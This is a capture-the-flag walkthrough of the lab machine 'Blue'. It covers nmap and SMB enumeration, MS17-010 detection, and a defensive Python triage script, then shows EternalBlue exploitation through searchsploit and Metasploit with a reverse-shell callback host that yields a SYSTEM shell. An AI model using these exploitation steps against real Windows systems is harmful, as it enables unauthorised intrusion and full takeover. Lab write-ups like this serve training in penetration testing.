# Blue

**Reconnaissance:**

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.40

135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2023-12-10T02:48:34
|_  start_date: 2023-12-10T02:39:33
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-12-10T02:48:33+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
```

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -p- 10.10.10.40
```

nmap found the three standard Windows ports, RPC (135), NetBIOS (139), and SMB (445), as well as several high ephemeral RPC-associated ports in the 49000s. The SMB output identifies the host as Windows 7 Professional.

**SMB - TCP 445**

**Shares:** \
There are a couple of shares with null session read access (the trick of giving smbmap wrong creds works here):

```
┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.40

┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.10.40 -u "0xdf" -p "0xdf"
[+] IP: 10.10.10.40:445 Name: 10.10.10.40               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY
```

Share is empty:

```
┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.40/share
```

Users has just empty Default and Public folders:

```
┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.40/users
```

**Vulns:** \
nmap has vuln scripts that check for known vulnerabilities in a service. I’ll run the SMB ones here, and they find a big one, MS17-010:

```
┌──(kali㉿kali)-[~]
└─$ nmap -v --script 'smb-vuln*' -p 139,445 10.10.10.40

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
```
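The scan output above packs three defender-relevant facts into nmap's host script results: SMB2 signing is enabled but not required, the SMBv1 negotiate reports signing disabled, and the host is flagged VULNERABLE to MS17-010. As an added example (not part of the original writeup or of nmap), the Python below parses nmap's normal-format host script output into per-script lines and turns those facts into prioritised findings with remediation. `SAMPLE_SCAN` is a constructed excerpt modelled on the results on this page; the `Finding` class and the function names are my own, and the registry value names in the remediation text are Microsoft's documented LanmanServer settings.

```python
"""Triage nmap SMB host-script output into prioritised findings (added example)."""
import re
from dataclasses import dataclass

# Constructed excerpt modelled on the nmap host script results on this page.
SAMPLE_SCAN = """\
Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   Computer name: haris-PC
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass
class Finding:
    severity: str
    title: str
    evidence: str
    remediation: str


def parse_host_scripts(text):
    """Group nmap normal-output script lines by script name.

    A script header is indented by at most one space after the '|' / '|_'
    prefix ('| smb2-security-mode:' or the one-liner '|_smb-vuln-ms10-054: false');
    deeper indentation is a body line of the current script.
    Returns {script_name: [stripped body lines]}.
    """
    scripts = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue  # not part of the script output block
        line = raw[1:]
        if line.startswith("_"):  # '|_' marks the last line of a script
            line = line[1:]
        indent = len(line) - len(line.lstrip(" "))
        content = line.strip()
        if not content:
            continue
        if indent <= 1:
            name, _, rest = content.partition(":")
            current = name.strip()
            scripts[current] = [rest.strip()] if rest.strip() else []
        elif current is not None:
            scripts[current].append(content)
    return scripts


def triage(scripts):
    """Turn parsed script results into findings, worst first."""
    findings = []

    ms17 = scripts.get("smb-vuln-ms17-010", [])
    if any(line.startswith("State: VULNERABLE") for line in ms17):
        cves = sorted({c for line in ms17 for c in re.findall(r"CVE-\d{4}-\d+", line)})
        findings.append(Finding(
            "critical", "MS17-010: unauthenticated RCE in SMBv1",
            ", ".join(cves) or "nmap smb-vuln-ms17-010 reports VULNERABLE",
            "Install the MS17-010 update, disable SMBv1, and block TCP 445 "
            "from untrusted networks.",
        ))

    smb1 = scripts.get("smb-security-mode", [])
    if any(line.startswith("message_signing: disabled") for line in smb1):
        findings.append(Finding(
            "high", "SMBv1 negotiated with message signing disabled",
            "smb-security-mode: " + next(l for l in smb1 if l.startswith("message_signing")),
            "Disable SMBv1 (LanmanServer\\Parameters SMB1=0) or require signing "
            "(RequireSecuritySignature=1).",
        ))

    smb2 = scripts.get("smb2-security-mode", [])
    if any("enabled but not required" in line for line in smb2):
        findings.append(Finding(
            "medium", "SMB2/3 message signing not required",
            "smb2-security-mode: Message signing enabled but not required",
            "Enable 'Microsoft network server: Digitally sign communications "
            "(always)' so signing is mandatory.",
        ))

    # Scripts that answer 'false' are negative checks and produce no finding.
    return sorted(findings, key=lambda f: SEVERITY_RANK[f.severity])


def triage_text(text):
    """Convenience wrapper: nmap normal output -> list of Finding, worst first."""
    return triage(parse_host_scripts(text))


if __name__ == "__main__":
    for f in triage_text(SAMPLE_SCAN):
        print(f"[{f.severity.upper()}] {f.title}\n  evidence: {f.evidence}\n  fix: {f.remediation}")
```

Feed it `nmap -oN` output from a sweep of the SMB scripts and the critical finding lands on top, with the CVE pulled from the script's IDs line; a host that answers `smb-vuln-ms17-010: false` produces no finding at all.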

**Exploitation: Shell as System**

MS17-010, otherwise known as ETERNALBLUE, is an unauthenticated remote code execution vulnerability in Windows SMB, most famous for its leak by the Shadow Brokers and for driving the WannaCry worm in May 2017.

The exploits in Metasploit for MS17-010 are much more stable than their Python script counterparts. If you’re doing this in the real world, I’d strongly recommend using Metasploit here. If you’re doing this for some kind of training activity that doesn’t allow Metasploit (like OSCP), then the downside of crashing a few boxes is acceptable. I’ll show both.

**Metasploit:**\
First, search the Exploit Database for a standalone (non-Metasploit) exploit:

```
┌──(kali㉿kali)-[~]
└─$ searchsploit --id MS17-010
------------------------------------------------------------ ---------------------------------
 Exploit Title                                              |  EDB-ID
------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'Eter | 43970
Microsoft Windows - SMB Remote Code Execution Scanner (MS17 | 41891
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalB | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB R | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SM | 41987
------------------------------------------------------------ ---------------------------------
```

We’re working with Windows 7, so we’ll use exploit #42315. Copy the exploit into the working directory (`searchsploit -m` mirrors it):

```
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 42315
  Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
      URL: https://www.exploit-db.com/exploits/42315
     Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
    Codes: CVE-2017-0144
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/42315.py
```

```
┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole

msf6 > search ms17-010
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
```

Running it returns a shell as SYSTEM:

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

meterpreter > getuid
meterpreter > shell
```

